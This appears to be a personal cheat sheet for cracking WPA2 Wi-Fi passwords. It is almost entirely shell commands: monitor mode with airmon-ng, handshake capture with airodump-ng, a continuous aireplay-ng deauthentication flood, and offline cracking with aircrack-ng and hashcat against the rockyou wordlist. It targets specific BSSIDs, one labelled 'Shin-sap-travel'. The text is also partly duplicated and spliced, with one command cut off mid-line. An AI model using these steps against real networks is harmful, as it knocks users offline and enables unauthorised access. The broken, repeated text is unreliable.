2
08:36:C9:63:1C:28
 30:89:D3:33:BE:77  -65        6        0    0   1   65   WPA2 CCMP   PSK  Shin-sap-travel                          



ifconfig wlo1mon down
iwconfig wlan0mon mode monitor
ifconfig wlo1mon up



sudo airmon-ng start wlan0
airmon-ng check kill 
airodump-ng wlan0mon




---------------------- Start
airmon-ng start wlan0mon

---------------------- Second Step
airodump-ng wlan0mon

---------------------- PUT IT MONITOR MODE
airodump-ng -c 10 --bssid 2
08:36:C9:63:1C:28

ifconfig wlo1mon down
iwconfig wlan0mon mode monitor
ifconfig wlo1mon up



sudo airmon-ng start wlan0
airmon-ng check kill 
airodump-ng wlan0mon




---------------------- Start
airmon-ng start wlan0mon

---------------------- Second Step
airodump-ng wlan0mon

---------------------- PUT IT MONITOR MODE
airodump-ng -c 1 --bssid 30:89:D3:33:BE:77 -w wifi_attackfile wlan0mon

---------------------- DE-AUTHENTICATE
aireplay-ng -0 0 -a 30:89:D3:33:BE:77 wlan0mon

---------------------- Crack it!
aircrack-ng -w rockyou.txt {Name}-01.cap





-------------------------------------------USING HACHCAT(if airmon did not work, faster)
hashcat --help

2500 
WPA-EAPOL-PBKDF2

(use different cap file, must convert it) - https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
hashcat -a 0 -m 2500



















 -w wifi_attackfile wlan0mon

---------------------- DE-AUTHENTICATE
aireplay-ng -0 0 -a 08:36:C9:62:C8:77 wlan0mon

---------------------- Crack it!
aircrack-ng -w rockyou.txt {Name}-01.cap





-------------------------------------------USING HACHCAT(if airmon did not work, faster)
hashcat --help

2500 
WPA-EAPOL-PBKDF2

(use different cap file, must convert it) - https://www.onlinehashcrack.com/tools-cap-to-hccapx-converter.php
hashcat -a 0 -m 2500 {hccapx} rockyou.txt



















